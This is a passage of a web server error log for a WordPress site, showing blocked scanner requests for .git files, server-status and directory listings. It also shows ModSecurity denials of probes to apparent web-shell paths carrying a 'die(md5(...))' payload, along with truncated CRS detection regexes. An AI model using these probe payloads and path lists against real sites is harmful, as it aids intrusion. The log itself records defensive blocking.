(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Sep 01 06:36:28.812127 2024] [authz_core:error] [pid 26020:tid 140340077987584] [client 147.182.200.94:36380] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/01 06:36:33 [error] 25512#25512: *90574 access forbidden by rule, client: 147.182.200.94, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2024/09/01 07:43:33 [error] 25513#25513: *91332 access forbidden by rule, client: 54.247.210.190, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Sun Sep 01 11:58:09.745711 2024] [authz_core:error] [pid 25653:tid 140340153521920] [client 209.38.208.202:41512] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/01 11:58:14 [error] 25513#25513: *93362 access forbidden by rule, client: 209.38.208.202, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Sep 01 17:15:24.397991 2024] [:error] [pid 25651:tid 140340069594880] [client 78.153.140.224:45788] [client 78.153.140.224] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/.config"] [unique_id "ZtTnfBc9SfPNqKGwb1rGewAAABI"] [Sun Sep 01 17:15:24.466384 2024] [:error] [pid 25653:tid 140340195485440] [client 78.153.140.224:45790] [client 78.153.140.224] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/.config"] [unique_id "ZtTnfMsU2FEnnDPfBYqoxQAAAIM"] [Sun Sep 01 17:15:27.591675 2024] [:error] [pid 26020:tid 140340128343808] [client 78.153.140.224:45798] [client 78.153.140.224] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/.config"] [unique_id "ZtTnf0jdhiZFW01zCg3_EgAAAMs"] 2024/09/01 23:41:45 [error] 25512#25512: *99070 access forbidden by rule, client: 3.250.94.198, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Sep 02 03:39:40.082092 2024] [ssl:warn] [pid 14668:tid 140072656873344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 02 03:39:40.543302 2024] [ssl:warn] [pid 14669:tid 140072656873344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 02 03:39:41.191710 2024] [ssl:warn] [pid 14669:tid 140072656873344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 02 03:39:44.438810 2024] [ssl:warn] [pid 14669:tid 140072656873344] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 02 03:39:46.849436 2024] [ssl:warn] [pid 15084:tid 140531924551552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Sep 02 03:39:47.287720 2024] [ssl:warn] [pid 15085:tid 140531924551552] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/09/02 11:44:11 [error] 14971#14971: *105622 access forbidden by rule, client: 195.178.110.35, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/02 12:56:56 [error] 14971#14971: *106133 access forbidden by rule, client: 195.178.110.35, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Mon Sep 02 13:21:19.354960 2024] [autoindex:error] [pid 15102:tid 140531665467136] [client 193.34.213.138:38166] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 02 13:44:37.495705 2024] [autoindex:error] [pid 15334:tid 140531556361984] [client 193.34.213.138:38682] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 02 14:36:54.509099 2024] [authz_core:error] [pid 15103:tid 140531539576576] [client 159.223.132.86:40038] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/02 14:36:58 [error] 14970#14970: *107105 access forbidden by rule, client: 159.223.132.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Mon Sep 02 16:16:28.832367 2024] [authz_core:error] [pid 15103:tid 140531606718208] [client 167.172.232.142:42408] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/02 16:16:32 [error] 14970#14970: *108084 access forbidden by rule, client: 167.172.232.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Mon Sep 02 17:02:27.958178 2024] [autoindex:error] [pid 15102:tid 140531615110912] [client 78.142.18.92:43262] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 02 17:02:29.000423 2024] [autoindex:error] [pid 15104:tid 140531741804288] [client 78.142.18.92:43264] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Sep 02 17:02:46.588004 2024] [autoindex:error] [pid 15103:tid 140531581540096] [client 78.142.18.92:43288] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/09/02 17:02:50 [error] 14970#14970: *108412 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 78.142.18.92, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" 2024/09/02 17:02:52 [error] 14970#14970: *108413 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 78.142.18.92, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Mon Sep 02 17:02:56.374558 2024] [autoindex:error] [pid 15334:tid 140531547969280] [client 78.142.18.92:43290] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/09/02 17:14:13 [error] 14970#14970: *108468 access forbidden by rule, client: 195.178.110.35, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2024/09/02 18:15:28 [error] 14971#14971: *108770 access forbidden by rule, client: 195.178.110.35, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2024/09/02 19:27:31 [error] 14971#14971: *109238 access forbidden by rule, client: 195.178.110.35, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/09/03 02:35:17 [error] 14970#14970: *111562 access forbidden by rule, client: 3.250.94.198, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Tue Sep 03 03:12:08.281103 2024] [ssl:warn] [pid 7195:tid 140349317805952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 03 03:12:08.560465 2024] [ssl:warn] [pid 7196:tid 140349317805952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 03 03:12:08.947769 2024] [ssl:warn] [pid 7196:tid 140349317805952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 03 03:12:11.233477 2024] [ssl:warn] [pid 7196:tid 140349317805952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 03 03:12:13.570345 2024] [ssl:warn] [pid 7611:tid 140442726422400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 03 03:12:13.814168 2024] [ssl:warn] [pid 7612:tid 140442726422400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Sep 03 07:35:41.329521 2024] [autoindex:error] [pid 7629:tid 140442318358272] [client 13.82.132.116:54280] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/09/03 14:40:49 [error] 7593#7593: *117752 access forbidden by rule, client: 3.249.138.188, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Sep 04 03:13:49.812119 2024] [:error] [pid 7631:tid 140442402285312] [client 193.34.213.138:46724] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php:147 [Wed Sep 04 03:13:49.812247 2024] [:error] [pid 7631:tid 140442402285312] [client 193.34.213.138:46724] Stack trace: [Wed Sep 04 03:13:49.812267 2024] [:error] [pid 7631:tid 140442402285312] [client 193.34.213.138:46724] #0 {main} [Wed Sep 04 03:13:49.812380 2024] [:error] [pid 7631:tid 140442402285312] [client 193.34.213.138:46724] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php on line 147 [Wed Sep 04 03:16:41.872972 2024] [ssl:warn] [pid 29814:tid 140684268648320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 04 03:16:42.161471 2024] [ssl:warn] [pid 29815:tid 140684268648320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 04 03:16:42.796623 2024] [ssl:warn] [pid 29815:tid 140684268648320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 04 03:16:45.520571 2024] [ssl:warn] [pid 29815:tid 140684268648320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 04 03:16:47.924956 2024] [ssl:warn] [pid 30231:tid 140389052188544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 04 03:16:48.197052 2024] [ssl:warn] [pid 30232:tid 140389052188544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Sep 04 06:21:27.473621 2024] [authz_core:error] [pid 30252:tid 140388664805120] [client 142.93.129.190:49082] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/04 06:21:32 [error] 30131#30131: *124270 access forbidden by rule, client: 142.93.129.190, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Sep 04 14:48:57.738916 2024] [autoindex:error] [pid 30868:tid 140388664805120] [client 75.119.143.226:56906] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 04 14:49:08.333009 2024] [autoindex:error] [pid 30868:tid 140388681590528] [client 75.119.143.226:56918] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 04 14:49:17.138144 2024] [autoindex:error] [pid 30252:tid 140388757124864] [client 75.119.143.226:56930] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sodium_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 04 14:49:32.104829 2024] [autoindex:error] [pid 30252:tid 140388689983232] [client 75.119.143.226:56936] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 04 14:49:44.628647 2024] [autoindex:error] [pid 30868:tid 140388706768640] [client 75.119.143.226:56944] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Sep 04 17:42:51.156239 2024] [authz_core:error] [pid 30868:tid 140388706768640] [client 134.122.28.88:60664] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/09/04 17:42:56 [error] 30131#30131: *130072 access forbidden by rule, client: 134.122.28.88, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2024/09/04 22:34:59 [error] 30132#30132: *133326 access forbidden by rule, client: 195.178.110.21, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Sep 05 03:47:45.312938 2024] [ssl:warn] [pid 20619:tid 139960597780352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 05 03:47:45.651053 2024] [ssl:warn] [pid 20620:tid 139960597780352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 05 03:47:46.167447 2024] [ssl:warn] [pid 20620:tid 139960597780352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 05 03:47:49.327907 2024] [ssl:warn] [pid 20620:tid 139960597780352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 05 03:47:51.885510 2024] [ssl:warn] [pid 21037:tid 140690583226240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Sep 05 03:47:52.234297 2024] [ssl:warn] [pid 21038:tid 140690583226240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/09/05 13:10:50 [error] 20934#20934: *141046 access forbidden by rule, client: 179.43.188.122, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Sep 05 13:44:59.488333 2024] [autoindex:error] [pid 21612:tid 140690302428928] [client 20.204.154.50:54780] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/09/05 15:05:34 [error] 20934#20934: *142026 access forbidden by rule, client: 45.148.10.206, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Thu Sep 05 19:46:06.227265 2024] [:error] [pid 21612:tid 140690400478976] [client 134.209.115.186:33016] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/db-cache.php"] [unique_id "ZtpQzhZwmjFhWIYQyXN1VAAAAMA"] [Thu Sep 05 19:47:48.196925 2024] [:error] [pid 21612:tid 140690168145664] [client 134.209.115.186:33042] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/admin.php"] [unique_id "ZtpRNBZwmjFhWIYQyXN1VwAAANM"] [Thu Sep 05 19:47:55.895234 2024] [:error] [pid 21058:tid 140690294036224] [client 134.209.115.186:33046] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ZtpROx5Z66YYPYaZuMqI0QAAAAQ"] [Thu Sep 05 19:49:06.944063 2024] [:error] [pid 21612:tid 140690184931072] [client 134.209.115.186:33050] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/hoot.php"] [unique_id "ZtpRghZwmjFhWIYQyXN1WAAAANE"] [Thu Sep 05 19:50:36.992081 2024] [:error] [pid 21612:tid 140690277250816] [client 134.209.115.186:33084] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/admin.php"] [unique_id "ZtpR3BZwmjFhWIYQyXN1XgAAAMY"] [Thu Sep 05 19:50:45.778932 2024] [:error] [pid 21060:tid 140690235287296] [client 134.209.115.186:33088] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp.php"] [unique_id "ZtpR5ZIS32OSfVXD8D6FsAAAAIs"] [Thu Sep 05 19:51:57.099980 2024] [:error] [pid 21612:tid 140690260465408] [client 134.209.115.186:33094] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:google: die(md5(32434));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/about.php"] [unique_id "ZtpSLRZwmjFhWIYQyXN1YQAAAMg"] [Thu Sep 05 19:53:04.720143 2024] [:error] [pid 21612:tid 140690400478976] [client 134.209.115.186:33112] [client 134.209.115.186] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:google. [file 